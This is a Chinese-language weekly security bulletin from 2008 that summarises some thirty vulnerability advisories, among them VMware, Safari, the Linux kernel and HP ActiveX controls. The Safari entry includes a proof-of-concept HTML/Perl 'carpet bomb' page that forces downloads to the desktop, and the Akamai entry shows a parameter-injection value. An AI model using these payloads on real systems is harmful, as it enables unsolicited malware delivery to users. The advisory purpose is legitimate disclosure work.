当前位置: 安全纵横 > 安全公告

一周业界安全动态(6月2日-6月8日)

来源:安恒信息 日期:2008-06

Xerox DocuShare多个跨站脚本漏洞
Xerox DocuShare是基于Web的内容管理解决方案。
DocuShare没有正确地过滤对dsdn/dsweb/SearchResults/或dsdn/dsweb/Services/所提供的输入返回给了用户,这允许远程攻击者通过跨站脚本攻击在用户浏览器会话中执行任意HTML和脚本代码。
目前厂商还没有提供补丁或者升级程序:
http://www.xerox.com

 

LokiCMS admin.php文件绕过安全限制漏洞
LokiCMS是一款简单易用的网络内容管理系统。
LokiCMS的admin.php文件中存在逻辑错误,如果远程攻击者在所提交的HTTP POST请求中设置了LokiACTION和其他参数的话,则无需管理权限就可以设置CMS main settings。
目前厂商还没有提供补丁或者升级程序:
http://www.lokicms.com/

 

TorrentTrader scrape.php脚本SQL注入漏洞
TorrentTrader是用PHP编写的torrent tracker平台。
TorrentTrader在验证访问IP列表时存在SQL漏洞,远程攻击者可能利用此漏洞绕过访问限制。
如果要下载受限制的torrent,用户要登录到TorrentTrader,然后其IP储存在许可用户的列表中。当bittorrent客户端连接时,会检查这个IP地址是否为许可用户列表中的地址。
TorrentTrader的scrape.php脚本中存在SQL注入漏洞,如果用户使用本地代理或其他方式在bittorrent客户端请求中包含 HTTP_X_FORWARDED_FOR或HTTP_CLIENT_IP头的话,就可以得到客户端数据库中所有IP的列表,通过这个列表可以绕过限制与 正常用户一样使用tracker。
目前厂商已经发布了升级补丁以修复这个安全问题:
http://downloads.sourceforge.net/torrenttrader/TorrentTraderClassic_v1.08.zip?modtime=1210690965&big_mirror=0

 

Windows上Apple Safari任意文件下载执行漏洞
Safari是苹果家族操作系统所捆绑的WEB浏览器。
Safari浏览器无法配置为在下载资源之前获得用户的许可,未经用户同意便将资源下载到了默认的位置。
假设用户访问了提供以下HTML的恶意站点http://malicious.example.com/
<HTML>
<iframe id="frame" src="http://malicious.example.com/cgi-bin/carpet_bomb.cgi"></iframe>
<iframe id="frame" src="http://malicious.example.com/cgi-bin/carpet_bomb.cgi"></iframe>
<iframe id="frame" src="http://malicious.example.com/cgi-bin/carpet_bomb.cgi"></iframe>
...
...
...
...
<iframe id="frame" src="http://malicious.example.com/cgi-bin/carpet_bomb.cgi"></iframe>
</HTML>

其中http://malicious.example.com/cgi-bin/carpet_bomb.cgi 为:
#!/usr/bin/perl
print "Content-type: blah/blah\n\n"
由于Safari不知道如何渲染blah/blah内容类型,就会自动开始下载carpet_bomb.cgi。如果在Windows平台上使用Safari的话,访问http://malicious.example.com/ 后就会未经用户同意向用户桌面下载恶意软件。
目前厂商还没有提供补丁或者升级程序:
http://www.apple.com

 

VMware HGFS文件系统堆溢出漏洞
VMWare是一款虚拟PC软件,允许在一台机器上同时运行两个或多个Windows、DOS、LINUX系统。
VMware的主机访客文件系统(HGFS)共享文件夹功能允许用户在Guest操作系统与承载该系统的非虚拟化主机操作系统之间传输数据。VMware 的HGFS功能存在堆溢出漏洞,如果VMware系统共享了至少一个文件夹的话(非默认),就可能触发这个溢出,非特权的Guest进程可以在主机上以 vmx进程的权限执行任意代码。
目前厂商已经发布了升级补丁以修复这个安全问题:
http://www.vmware.com/download

 

VMware VMCI功能任意代码执行漏洞
VMWare是一款虚拟PC软件,允许在一台机器上同时运行两个或多个Windows、DOS、LINUX系统。
VMCI是VMware产品中的一个可选功能,允许虚拟机之间相互通讯。如果启用了VMCI功能的话,Guest就可以在主机上以vmx进程的权限执行任意指令。这个漏洞仅影响运行在Windows主机上的系统。
目前厂商已经发布了升级补丁以修复这个安全问题:
http://www.vmware.com/download/

 

联众世界GLIEDown2.dll Active控件多个缓冲区溢出漏洞
联众世界是在中国非常流行的在线游戏网站。
联众世界的游戏大厅主程序GLWorld所安装的GLIEDown2.dll ActiveX控件(CLSID:F917534D-535B-416B-8E8F-0C04756C31A8)没有正确地处理对IEStart()、 IEStartNative()方式以及ServerList、GameInfo和GruopName属性的输入参数。如果用户受骗访问了恶意网页并向这 些方式传送了特制参数的话,就可能触发堆溢出或栈溢出,导致在用户系统上执行任意指令。
利用此漏洞进行挂马的0day攻击已经出现。
目前厂商还没有提供补丁或者升级程序:
http://www.ourgame.com/

 

CMSimple文件上传及本地文件包含漏洞及
CMSimple是基于PHP的小型网站内容管理工具。
CMSimple的index.php脚本中没有正确地过滤对sl参数的输入便用于包含本地文件;index.php脚本没有正确地限制对登录用户的访问,可能导致上传任意文件并执行任意PHP代码。成功利用这些漏洞要求打开了register_globals。
前厂商已经发布了升级补丁以修复这个安全问题:
http://www.cmsimple.org/?Downloads:Security_fix

 

ikiwiki空口令绕过认证漏洞
Ikiwiki是一个wiki编译器,可将wiki页面转换为可在网站发布的HTML页面。
Ikiwiki在处理访问认证时存在漏洞,如果在Ikiwiki中启用了openid和passwordauth插件的话(默认配置),用户就可以通过带有空口令的登录请求绕过认证限制登录,访问openid相关帐号。
目前厂商已经发布了升级补丁以修复这个安全问题:
http://ftp.de.debian.org/debian/pool/main/i/ikiwiki/ikiwiki_2.48.tar.gz

 

DotNetNuke Default.aspx跨站脚本漏洞
DotNetNuke(DNN)是免费的开源内容管理系统。
DotNetNuke的Default.aspx页面没有正确地过滤用户通过URL提交的输入,远程攻击者可以提交恶意URL请求执行跨站脚本攻击。
目前厂商还没有提供补丁或者升级程序:
http://www.dotnetnuke.com/

 

FFFTP客户端目录遍历漏洞
FFFTP是一款小型的FTP客户端软件。
FFFTP客户端没有正确地验证FTP服务器所返回的LIST命令响应中包含有目录遍历序列(斜线)的文件名,如果用户受骗从恶意的FTP服务器下载的目录包含有带有恶意文件名的文件的话,就可能导致向用户系统的任意位置写入文件。
目前厂商还没有提供补丁或者升级程序:
http://www2.biglobe.ne.jp/~sota/ffftp-e.html

 

freeSSHd SFTP命令栈溢出漏洞
freeSSHd是免费的SSH服务器实现。
freeSSHd在处理SFTP命令时存在栈溢出漏洞,如果远程攻击者可以SFTP访问服务器并通过SFTP命令请求了带有超长名称的目录的话,就可以触发这个溢出,导致执行任意指令。
目前厂商还没有提供补丁或者升级程序:
http://www.freesshd.com/

 

Alt-N SecurityGateway username参数栈溢出漏洞
Alt-N SecurityGateway是为Exchange和SMTP服务器设计的垃圾邮件防火墙。
Alt-N SecurityGateway在处理发送给管理Web接口的HTTP请求时存在栈溢出漏洞,如果远程攻击者向SecurityGateway.dll发送了带有超长username参数的HTTP请求的话,就可以触发这个溢出,导致执行任意指令。
目前厂商还没有提供补丁或者升级程序:
http://www.altn.com

 

Linux Kernel sys_utimensat本地拒绝服务漏洞
Linux Kernel是开放源码操作系统Linux所使用的内核。
Linux Kernel的utimensat系统调用(sys_utimensat)在使用某些UTIME_NOW和UTIME_OMIT组合时没有检查文件权限,这可能允许本地用户修改任意文件的文件时间,导致拒绝服务的情况。
目前厂商已经发布了升级补丁以修复这个安全问题:
http://kernel.org/pub/linux/kernel/v2.6/linux-2.6.25.3.tar.bz2

 

Linux Kernel SPARC平台mmap()调用本地拒绝服务漏洞
Linux Kernel是开放源码操作系统Linux所使用的内核。
Linux Kernel内核的实现上存在漏洞,如果没有设置mmap MAP_FIXED位的话,Linux Kernel的arch/sparc/kernel/sys_sparc.c文件中的sparc_mmap_check函数以及arch/sparc64 /kernel/sys_sparc.c文件中的sparc64_mmap_check函数会忽略一些虚拟地址范围,这允许本地攻击者通过恶意的mmap 调用导致拒绝服务。
目前厂商已经发布了升级补丁以修复这个安全问题:
http://kernel.org/pub/linux/kernel/v2.6/linux-2.6.25.3.tar.bz2

 

Linux Kernel ipip6_rcv()函数远程拒绝服务漏洞
Linux Kernel是开放源码操作系统Linux所使用的内核。
Linux Kernel的net/ipv6/sit.c文件中的ipip6_rcv函数中存在内存泄露漏洞,如果远程攻击者向简单Internet传输(SIT)隧 道接口发送了与pskb_may_pull、kfree_skb函数和skb引用计数管理相关的恶意网络通讯的话,就可能触发这个漏洞,导致耗尽内存。
目前厂商已经发布了升级补丁以修复这个安全问题:
http://www.kernel.org/pub/linux/kernel/v2.4/linux-2.4.36.5.tar.bz2

 

Apache Tomcat主机管理器跨站脚本漏洞
Apache Tomcat是一个流行的开放源码的JSP应用服务器程序。
Apache Tomcat的host-manager/html/add文件没有正确地过滤对name参数的输入便返回给了用户,这允许远程攻击者通过跨站脚本攻击在登录用户浏览器会话中执行任意HTML和脚本代码。
目前厂商已经发布了升级补丁以修复这个安全问题:
http://jakarta.apache.org/tomcat/index.html

 

C6 Messenger下载Url DownloaderActiveX控件远程代码执行漏洞
C6 Messenger是由意大利电信提供的即时聊天程序。
C6 Messenger所安装的ActiveX控件实现上存在漏洞,远程攻击者可能利用此漏洞控制用户系统。
用户可从 http://c6.community.alice.it/download/c6.html 下载并安装C6 Messenger。当使用IE访问这个URL的话,就会提示用户安装DownloaderActiveX控件 (CLSID:c1b7e532-3ecb-4e9e-bb3a-2951ffe67c61)。该控件没有正确地验证对propDownloadUrl属 性的输入参数,如果用户安装了控件后访问恶意网页的话,就会导致执行任意代码。
目前厂商还没有提供补丁或者升级程序:
http://c6.community.alice.it/download/c6.html

 

Asterisk SIP通道驱动远程拒绝服务漏洞
Asterisk是开放源码的软件PBX,支持各种VoIP协议和设备。
Asterisk在以pedantic模式处理SIP时,Asterisk将From头的值传送给了ast_uri_decode函数进行解码。由于没有检查From值是否为空,因此上述情况可能导致例程崩溃。
目前厂商已经发布了升级补丁以修复这个安全问题:
http://downloads.digium.com/pub/telephony/asterisk

 

MDaemon WorldClient远程拒绝服务及栈溢出漏洞
Alt-N MDaemon是一款基于Windows的邮件服务程序,WorldClient是其客户端。
WordClient客户端(默认监听于TCP 3000端口)在处理对其发送的HTTP请求时存在空指针引用错误,如果远程攻击者向WorldClient.dll发送了特制的HTTP POST请求的话,就可能导致客户端崩溃。
WordClient接口在处理带有超长Subject字段的Reply请求时存在栈溢出漏洞,如果远程攻击者从WordClient接口发送了特制邮件的话就可以触发这个溢出,导致执行任意代码。成功利用这个漏洞要求在服务器上拥有有效的邮件帐号。
目前厂商还没有提供补丁或者升级程序:
http://www.altn.com

 

Akamai下载管理器参数注入漏洞
Akamai下载管理器是用于帮助用户方便下载的客户端软件。
Akamai的ActiveX控件在处理参数数据时存在漏洞,远程攻击者可能利用此漏洞在用户系统的任意地方写入文件。
当用户从http://dlm.tools.akamai.com/tools/upgrade.html 下载安装Akamai下载管理器ActiveX控件时,其参数设置为:
<PARAM name="URL" value="http://dlm.tools.akamai.com/tools_files/Readme.txt">
然后设置URL值。但如果向URL注入其他字符的话,也可以正确的解析,例如:
<PARAM name="URL"
value="http://dlm.tools.akamai.com/tools_files/Readme.txt\x0Areferer=http://ruder.cdut.net">
由于ActiveX所设置的参数值以INI文件格式保存在临时文件中,上述方式会改变referer值。
此外,使用了target参数设置下载文件的位置,含义如下:
    "DESKTOP"         将文件保存到桌面
    "AUTO"             将文件保存到临时Internet文件中
    ""             询问用户选择保存位置
正常情况下target值只能设置为以上三个值,其他值会被过滤掉。但如果通过参数注入将该值设置为有效的文件路径的话,就可以任意设置target,Akamai下载管理器会未经用户交互直接将目标文件下载到用户系统的任意位置。
目前厂商已经发布了升级补丁以修复这个安全问题:
http://dlm.tools.akamai.com/tools/upgrade.html

 

NASA BigView PNM文件处理栈溢出漏洞
IBigView是NASA开发的图形查看器,可在运行Linux的桌面PC上将图形拉伸和缩放到任意尺寸。
BigView在解析特制的PNM输入文件时存在栈溢出漏洞,攻击者可能利用此漏洞通过诱使用户处理恶意文件控制用户系统。
目前厂商已经发布了升级补丁以修复这个安全问题:
http://opensource.arc.nasa.gov/project/bigview/

 

CA eTrust Secure Content Manager多个栈溢出漏洞
eTrust Secure Content Manager(eTrust SCM)是独立、统一的网关解决方案,能够帮助企业从中央管理控制台防范资料窃密以及网络和信息传递威胁。
eTrust SCM运行在8080端口上的HTTP网关服务(icihttp.exe)中存在多个栈溢出漏洞。如果用户发布了FTP服务请求,进程会试图修饰事件处理 的内容,在这种情况下如果指定了超长的LIST或PASV命令响应,就会触发栈溢出,导致以SYSTEM权限执行任意指令。
目前厂商已经发布了升级补丁以修复这个安全问题:
https://support.ca.com/irj/portal/anonymous/SolutionResults?aparNo=QO99987&os=NT&actionID=3

 

Skype file:// URI处理器绕过安全限制漏洞
Skype是一款流行的P2P VoIP软件,可提供高质量的语音通讯服务。
Skype的file:// URI处理器在处理可执行的下载时存在漏洞,攻击者可能利用此漏洞绕过检查过滤。
Skype的file:// URI处理器会对URL执行检查以确认链接中没有包含与可执行文件格式相关的文件扩展名。如果链接中包含有黑名单所列出的文件扩展名,就会向用户显示一个 警告对话框。由于执行检查时的逻辑错误,攻击者可以绕过安全警告执行程序。首先,检查使用的是区分大小写的比较;其次,黑名单没有涵盖所有的可执行文件格 式。如果攻击者使用了至少一个大写字符的话,或使用了黑名单中所没有的可执行文件类型,就可以绕过安全警告。
目前厂商已经发布了升级补丁以修复这个安全问题:
http://www.skype.com/download/skype/windows/
http://www.skype.com/download/skype/linux/
http://www.skype.com/download/skype/macosx/
http://www.skype.com/download/skype/pocketpc/

 

Kaspersky kl1.sys驱动本地栈溢出漏洞
Kaspersky Internet Security套件是一套完整的解决方案,用于保护计算机抵御几乎所有来自互联网的主要的威胁。
Internet Security及其他Kaspersky产品中所发布的kl1.sys内核驱动在处理IOCTL 0x800520e8时没有对向swprintf函数所传送的数据执行边界检查,在这种情况下目标缓冲区为2,000单元宽字符数据,因此如果源缓冲区超 过了2000字符的话,就可以触发栈溢出,导致执行任意内核态指令。
目前厂商已经发布了升级补丁以修复这个安全问题:
http://www.kaspersky.com/

 

HP Instant Support HPISDataManager.dll ActiveX控件ExtractCab函数缓冲区溢出漏洞
HP Instant Support是是基于网络的故障诊断和排除工具套件,适用于桌面计算和打印产品。
HP Instant Support所安装的HPISDataManager.dll ActiveX控件没有正确地过滤对ExtractCab函数的输入参数。如果用户受骗访问了恶意网页并向该函数传送了超长参数的话,就可能触发缓冲区溢出,导致执行任意指令。
HP已经为此发布了一个安全公告(HPSBMA02326)以及相应补丁:
http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c01422264

 

HP Instant Support HPISDataManager.dll ActiveX控件任意文件下载漏洞
HP Instant Support是是基于网络的故障诊断和排除工具套件,适用于桌面计算和打印产品。
HP Instant Support所安装的HPISDataManager.dll ActiveX控件没有正确地过滤对DownloadFile函数的输入参数。如果用户受骗访问了恶意网页并向该函数传送了超长参数的话,就可能导致向本地系统下载任意文件。
HP已经为此发布了一个安全公告(HPSBMA02326)以及相应补丁:
http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c01422264

 

HP Instant Support HPISDataManager.dll ActiveX控件StartApp函数文件执行漏洞
HP Instant Support是是基于网络的故障诊断和排除工具套件,适用于桌面计算和打印产品。
HP Instant Support所安装的HPISDataManager.dll ActiveX控件没有正确地过滤对StartApp函数的输入参数。如果用户受骗访问了恶意网页并向该函数传送了超长参数的话,就可能导致执行本地系统上的任意文件。
HP已经为此发布了一个安全公告(HPSBMA02326)以及相应补丁:
http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c01422264

 

HP Instant Support HPISDataManager.dll ActiveX控件GetFileTime函数缓冲区溢出漏洞
HP Instant Support是是基于网络的故障诊断和排除工具套件,适用于桌面计算和打印产品。
HP Instant Support所安装的HPISDataManager.dll ActiveX控件没有正确地过滤对GetFileTime函数的输入参数。如果用户受骗访问了恶意网页并向该函数传送了超长参数的话,就可能触发缓冲区 溢出,导致以当前登录用户的权限执行任意指令。
HP已经为此发布了一个安全公告(HPSBMA02326)以及相应补丁:
http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c01422264

 

HP Instant Support HPISDataManager.dll ActiveX控件MoveFile函数缓冲区溢出漏洞
HP Instant Support是是基于网络的故障诊断和排除工具套件,适用于桌面计算和打印产品。
HP Instant Support所安装的HPISDataManager.dll ActiveX控件没有正确地过滤对MoveFile函数的输入参数。如果用户受骗访问了恶意网页并向该函数传送了超长参数的话,就可能触发缓冲区溢出, 导致以当前登录用户的权限执行任意指令。
HP已经为此发布了一个安全公告(HPSBMA02326)以及相应补丁:
http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c01422264

 

HP Instant Support HPISDataManager.dll ActiveX控件RegistryString函数缓冲区溢出漏洞
HP Instant Support是是基于网络的故障诊断和排除工具套件,适用于桌面计算和打印产品。
HP Instant Support所安装的HPISDataManager.dll ActiveX控件没有正确地过滤对RegistryString函数的输入参数。如果用户受骗访问了恶意网页并向该函数传送了超长参数的话,就可能触发 缓冲区溢出,导致以当前登录用户的权限执行任意指令。
HP已经为此发布了一个安全公告(HPSBMA02326)以及相应补丁:
http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c01422264

 

HP Instant Support HPISDataManager.dll ActiveX控件写入任意文件漏洞
HP Instant Support是是基于网络的故障诊断和排除工具套件,适用于桌面计算和打印产品。
HP Instant Support所安装的HPISDataManager.dll ActiveX控件没有正确地过滤对AppendStringToFile函数的输入参数。如果用户受骗访问了恶意网页并向该函数传送了恶意参数的话,就 可能导致向系统上的任意位置写入任意文件。
HP已经为此发布了一个安全公告(HPSBMA02326)以及相应补丁:
http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c01422264

 

HP Instant Support HPISDataManager.dll ActiveX控件任意文件删除漏洞
HP Instant Support是是基于网络的故障诊断和排除工具套件,适用于桌面计算和打印产品。
HP Instant Support所安装的HPISDataManager.dll ActiveX控件没有正确地过滤对DeleteSingleFile函数的输入参数。如果用户受骗访问了恶意网页并向该函数传送了恶意参数的话,就可能导致删除系统上的任意文件。
HP已经为此发布了一个安全公告(HPSBMA02326)以及相应补丁:

http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c01422264